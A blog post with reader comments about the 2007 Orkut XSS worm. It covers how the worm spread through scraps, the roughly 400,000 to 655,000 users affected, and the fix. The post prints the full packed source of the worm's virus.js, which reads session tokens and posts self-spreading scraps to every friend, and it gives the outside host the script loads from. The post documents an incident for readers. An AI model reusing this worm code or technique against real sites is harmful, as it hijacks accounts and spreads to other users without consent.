Orkut XSS

Aftermath: Let's try and summarize everything here.

  1. On Orkut, you can use arbitrary HTML when scrapping your friends. Rodrigo's worm exploited this 'feature'. What it did was to start with scrapping a malicious flash file. Just viewing this scrap causes the flash object to load which in turn loads our favourite virus.js file. The Javascript code in that file first joins you in the community called Infectatos pelo Virus do Orkut (in English - Infected by the Orkut Virus) and then sends the same flash file as a scrap to as many people in your friends list as possible. So when each of your friends sees their Scrapbook, they in turn start propagating the worm to their friends, etc.

  2. Friends don't let friends use raw HTML would be a good maxim for everyone to follow ;-)

  3. It's fair to say that almost every member of that community was an involuntary signup. So based on the reported peak size of the community, more than 655,000 users were affected.

  4. The attack was apparently without malicious intent and done just to highlight the security problems with such networking sites. Although the motives might by clean, I question the modus operandi. McAfee folks have named this W32/KutWormor.

  5. This post got linked from various places including several bloggers, News.com, ZDNet and Valleywag(!). But, like Valleyway points out, if this had happened on MySpace or Facebook, it would be all over the US media.

  6. No official word from Orkut yet on this except this reply in a forum thread. Amusingly, the list of suggestions offered in that reply to 'stay safe' wouldn't have helped at all with this worm! This worm would have worked anyway unless you had Flash and/or Javascript disabled.

  7. Curiously enough, the official Orkut blog got a new post during/after this incident but the post says absolutely nothing about what happened!

That's the summary and hopefully the last update here! The original post covering this worm follows below.


Someone (maybe Rodrigo Lacerda, see below) seems to have found an XSS attack for Orkut. A piece of javascript code, named virus.js and fetched from a myopera location, somehow made its way into my Orkut session and started scrapping everyone possible at a break-neck speed. My friends reported Spanish Portuguese (see first comment below) language scraps with some Flash content from me while I've seen similar scraps in my Scrapbook.

From my initial Firebug console digging, this code sneaks in when opening the Scrapbook page. And the attack code is fetched just after loading gtalknotifier004.js so perhaps there's an XSS hole in that script. Not sure though, I'm a JS newbie :-)

For now, don't log on to Orkut! Or if you use Adblock, just block anything named *virus.js

Does anyone know how the hell should I report such stuff to Orkut? I can't seem to locate any vulnerability report form in their support pages.

Update: If you've blocked the virus.js file, log in and check your communities. You'll see an extra one! If you aren't able to unjoin the community, don't panic. I believe it's just an automated throttling response by Orkut's systems as a response to the massive scrapping initiated from our account. Should be fixed in a few hours.

Update: The embedded flash in the notorious scrap (_2008 vem ai... que ele comece mto bem para vc_) is also part of the exploit. I don't know exactly what it does since I use Flashblock all the time! Also, some blogs are suggesting changing of passwords. I don't think that's needed since I don't believe passwords have been compromised. Of course, don't treat my opinion as infallible advice, do what you must. I know I'm not changing my password just because of this!

Update: Reader Steve (thanks!) informs me in the comments below that this hole was reported sometime back and was already fixed. From this page:

On November 8th 2006 Rajesh Sethumadhavan discovered a type 2 vulnerability in the social network site Orkut which would make it possible for orkut members to inject HTML and JavaScript into their profile. Rodrigo Lacerda used this vulnerability to create a cookie stealing script known as the Orkut Cookie Exploit which was injected into the orkut profiles of the attacking member(s). By merely viewing these profiles unsuspecting targets had the communities they owned transferred to a fake account of the attacker. On December 12th Orkut had fixed the vulnerability.

And the actual report referenced in the above quote: Orkut Group Cross Site Scripting Vulnerability. I don't know enough to say whether the situation we are seeing today is due to the same vulnerability.

Update: People seem to think that somehow they were responsible for facilitating this attack. Like perhaps they clicked on a bad link or something. From what I understand, this isn't a phishing attack and there's nothing you could've done to prevent this. Except, maybe, not visiting Orkut.com!

Update: Apparently fixed!. The virus.js file is no longer fetched and all the spam scraps in my scrapbook have disappeared. I could unjoin the 'special' community too, which at this point of time has 390,262 members which means (at least) 390,262 affected users. That's not good!

Update: More from Reader Steve in the comments. Apparently, the community that we all are involuntarily a part of now, is some kind of vigilante community created just to make a point that these systems are insecure. Steve's comment:

The infected group is called "Infectados pelo Vírus do Orkut" and has nearly 400K members (minus me now).
The group description (loosely translated via Babelfish) is:
In computer science, a virus is a malicious program developed by programmers who, such as a biological virus, infectum the system, makes copies of itself exactly and tries to spread itself for other computers, using itself of diverse ways. Return more for the community SEES AS IF TO PROTECT Click With this you if not to want here. CALM! If you lode to stop in this community, is certain that no data its were stolen and nor go to be, is not this my objective. If I will be certain, in the end of everything, this community I must I am crowded of people. This to only show as orkut can be dangerous, you came to stop here without clicar in none link absolutely malicious, everything was made reading scraps.

Update: Some readers have kindly posted deobfuscated versions of the virus.js script. Thanks! Since they weren't fitting well in the comments below, I've moved them to a pastebin site. See version 1 and version 2. I'll post some analysis if I get time to do some!

The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js

function $(p,a,c,k,e,d) {
    e=function(c) {
        return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))
    };
    if(!''.replace(/^/,String)){
        while(c--){d[e(c)]=k[c]||e(c)}
        k=[function(e){return d[e]}];
        e=function(){return'\\w+'};
        c=1
    };
    while(c--){
        if(k[c]){
            p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
        }
    }
    return p
};
setTimeout(
    $('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
    L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
    7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
    8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
    5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
    7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
    7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
    t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
    3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
    3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
    7 V(){6(j==8.18("N").M){b};
    5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>[1j]25 "+i F()+"[/1j]<1k/><13 1o=\\"o://k.w.p/28.z\\" 2a=\\"Q/x-2c-2d\\" 2e=\\"2g\');
    r=8.1n(\'r\');r.1o=\'o://1p.2k.p/2n/1p/1s.1t\';8.D(\'1w\')[0].1f(r);19(\'\\" 1C=\\"1\\" 1E=\\"1\\"></13>";
    5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();
    3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");
    3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};
    6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();
    ',62,150,'|||xml||var|if|function|document|domain|send|return|path|wDate||select|name|begin|new|index|
    www|dc|expires|encodeURIComponent|http|com|POST|script|wormdoorkut|div|end|getCookie|orkut||cookie|aspx
    |prefix|createXMLHttpRequest|true|getElementsByTagName|SIG|Date|loadFriends|POST_TOKEN|scrapText|null|
    signature|catch|length|selectedList|item|value|application|open|indexOf|cmm_join|secure|sendScrap|setCookie|
    readyState|onreadystatechange|try|Content|86400|setRequestHeader|embed|ActiveXObject|Action|else|form|
    getElementById|escape|status|urlencoded|200|setTime|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|
    createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|GMT|go|GET|Compose|width|innerHTML|height|option|
    setAttribute|id|submit|style|display|none|removeChild|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|
    history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|raw|LoL|Msxml2|type|Microsoft|shockwave|flash|
    wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera
    |XMLHttpRequest|substring|virusdoorkut|CGI|Page'.split('|'),0,{}),1
);
author="Rodrigo Lacerda"

Comments

isn´t spanish... it is portuguese. "2008 is comming... that it begins really good for you" is the message.

I actually just deleted my Orkut account after getting pissed off at the fact that it seems to be spamming people without me even clicking on anything.

I pretty much just logged on to orkut and deleted all my spammy scraps and it seems that was enough to do the damage.

Im not very computer literate, but thats strange eh. Any suggestions on how Orkut users can stop this thing?

what does it mean? id doesn't have much sense, does it?

what does "function $(p,a,c,k,e,d)" mean?

If you use Firefox with the Adblock extension, just block anything named virus.js

There must be similar blocking solutions for IE. Or your firewall can help you block this file.

It's javascript code. Makes sense if you know the language :)

Hmm wonder if had something to do with simultaneous login to gtalk..

i can block it with adblock even after it already screwd up my orkut acc?

It'll prevent any further screwing of your account. Then we just wait for Orkut folks to clean up the mess!

I disabled Javascript in Firefox, logged into Orkut, saw two communities I didn't recognize, then re-enabled Javascript long enough to click "unjoin" and confirm.

I'm trying to figure out how I got added to these communities since I never explicitly did. Unless... I wonder if the community in question was perhaps hijacked by someone who changed the name and purpose of the community, and then used that to propagate their virus?

Anyway, it's bizarre in that I got three scraps from "friends" who obviously didn't send them and it's not at all clear how it started...

Sounds like this could be the straw that causes many folks to "sign out" from Orkut once and for all...

I blocked the javascript using adblock plus (from firefox). I also see the strange community in Portuguese language in my list of communities. but i cannot unjoin from the community. It says: "You have temporarily been disallowed from performing this action. Please try again after some time."

The infected group is called "Infectados pelo Vírus do Orkut" and has nearly 400K members (minus me now).

The group description (loosely translated via Babelfish) is:

In computer science, a virus is a malicious program developed by programmers who, such as a biological virus, infectum the system, makes copies of itself exactly and tries to spread itself for other computers, using itself of diverse ways. Return more for the community SEES AS IF TO PROTECT Click With this you if not to want here. CALM! If you lode to stop in this community, is certain that no data its were stolen and nor go to be, is not this my objective. If I will be certain, in the end of everything, this community I must I am crowded of people. This to only show as orkut can be dangerous, you came to stop here without clicar in none link absolutely malicious, everything was made reading scraps.

I'm guessing if you block the .js file, you'll be unable to unjoin. That's why I disabled Javascript, logged in, and re-enabled it to unjoin...

Did that work? It doesn't sound technically infeasible. My guess is that all our accounts have automatically been temporarily suspended from making any database changes since they've been scrapping like crazy.

See also http://lucky-six.blogspot.com/2007/12/orkut-xss-attack.html

Yes, I've seen that too. I think our activities have been automatically throttled by orkut's systems because of the high volume of scrapping. I guess we just wait for the limits to be lifted by Orkut folks. When does the Sun rise over there? :-)

Hey Steve. How about a link back to this page? :-)

Kunal, I am more inclined to believe someone found an exploit in their new notification feature.

http://en.blog.orkut.com/2007/11/scrap-alerts.html

Perhaps someone skilled in this trade can offer more clues!

@antrix: Sorry about that... lucky-six isn't my site, just another one with I found with more information on this stupid virus...

Actually, this site seems to indicate that it's already been fixed, but perhaps not before several communities were hijacked (as I guessed above): http://blackops.top-promoters.com/archives/8

In the middle of that page, see the "real world example" that starts out "On November 8th ...". It further links to the actual description of the vulnerability here: http://packetstormsecurity.org/0612-exploits/XD100098.txt

The decoding of the virus. I don't know if it is a good idea to post this. But will do it anyway. My friend and I used firebug to print out the output of function $ after unpacking.

snip!

BTW, an infected friend just wrote: >>>> Nope, all you had to do was visit Orkut with any modern browser. They allow HTML into your friends' scrapbooks, so they made a javascript based attack. When you viewed the page in the e-mail that Orkut sent you (and me), it loaded the virus.js, which then sent scraps to all your friends and joined you to a particular group. I just deleted my orkut account. Grrr. Has anyone disassembled the script yet? Clearly Orkut has _not_ fixed this. <<<<

Hmmm. I suspect the damage is done if you follow the scrapbook link before either disabling javascript or blocking the .js file.

I too have deleted my Orkut account. I'll be curious to hear if there's any residual damage from this script having run...

Not a good idea!

Here's a link to the decoded output: http://paste.uni.cc/17840

I too have FlashBlock installed, so I don't understand how this thing could've convinced my browser to further scrap my friends, but somehow it did. Thus I'm not sure that Flashblock (alone) is sufficient to block it...

Same here! I suspect there are multiple parts to this exploit. The scrapping itself could be initiated via a pure JS exploit while the flash file does some more damage.

Any idea if the vulnerability in that security report is the same one as this?

My assumption is that Flashblock prevents it from downloading and running. I checked a few of my friends scrapbooks, didn't find scraps from me there. Thanks for the post! :-)

Was surprised to see my inbox filled with Orkut notifications - apparently every human being I ever met suddenly was reminded of me last night and feeling bad, logged into Orkut and left me a scrap.

That illusion remained till now. I still haven't logged into Orkut (don't want to, from work) but damn you, D. I wanted to believe in the illusion.

Hi! As someone who has spent a long time playing with Orkut exploits, this is pretty interesting. At first glance it sounds like an updated version of something I found back in June 06, which (if memory serves me right) attempted to exploit XSS in a (very) limited fashion.

For what it's worth, if you mail me at PaperghostATvitalsecurityDOTorg, I can pass on info to a Google contact for you if still needed.

Thanks, Chris Boyd

Thanks for the offer but I guess they've already fixed it so there's no point in contacting them now.

But perhaps you'll be able to tell me if there is a really XSS exploit here.. 'cos I get the feeling that just the ability to post HTML scraps allowed the posting of that swf which in turn could pull in the external javascript code. Is there a vulnerability in the traditional sense?

any type up jobs


Markdown formatting supported